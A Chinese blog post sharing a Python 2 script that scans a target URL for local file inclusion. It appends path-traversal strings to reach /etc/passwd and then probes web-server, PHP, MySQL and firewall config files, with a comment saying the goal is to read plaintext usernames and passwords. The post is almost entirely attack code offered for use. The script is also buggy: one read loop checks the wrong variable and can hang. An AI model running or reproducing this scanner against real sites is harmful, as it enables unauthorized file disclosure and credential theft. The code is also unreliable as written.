探测本地文件包含的Python脚本[bak]

本文最后更新于2014年7月5日,已超过 1 年没有更新,如果文章内容失效,还请反馈给我,谢谢!

用Python写的检测本地文件包含的小工具,可以根据自己的需求/经验自己添加文件路径:

#!/usr/bin/env python
#-*-coding:utf-8-*-

import urllib2
import sys
var1=0
var2=0
print ("-----------------------------------------------------")
print ("|           usage:py_detect_LFI.py site url         |")
print ("|this url like http://www.google.com/index.php?id=  |")
print ("       writed by eip_0x[Freebuf],just 4 fun         |")
print ("-----------------------------------------------------")

site0=sys.argv[1]+'/kfdsjkf7675637d.txt'	#访问一个不存在的文件获取返回错误页面的length信息
req0=urllib2.Request(site0)
conn0=urllib2.urlopen(req0)

while 1:
    data0=conn0.read(4072)	#错误页面的内容
    if not len(data0):
        break

paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd']
paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf']

for path in paths1:	#首先查找'/etc/passwd'文件是否存在
	site=sys.argv[1]+path
	req=urllib2.Request(site)
	conn=urllib2.urlopen(req)
	while 1:
		data=conn.read(4072)
		if not len(data0):
			break

		if len(data)!=len(data0):
			print path," this file has been found!!!!u r lucky and have fun!!!!"

		for path2 in paths2:	#在查找到了'/etc/passwd'文件之后再查找配置文件,希望能从中读取出用户名密码的明文信息
			path2ok=path.replace("/etc/passwd",path2)	#replace("查找的内容","替换后的内容"[,次数]),替换次数可以为空,即表示替换所有
			site2=sys.argv[1]+path2ok
			req2=urllib2.Request(site2)
			conn2=urllib2.urlopen(req2)
			while 1:
				data2=conn2.read(4072)
				if not len(data2):
					break
				if len(data2)!=len(data0):
					print path2,"this file has been found!!"

如代码中所示,脚本是从Freebuf上搜集过来的,上面还有好多好东西,值得你去学习。

声明: 除非注明,ixyzero.com文章均为原创,转载请以链接形式标明本文地址,谢谢!
https://ixyzero.com/blog/archives/413.html

发表评论

邮箱地址不会被公开。 必填项已用*标注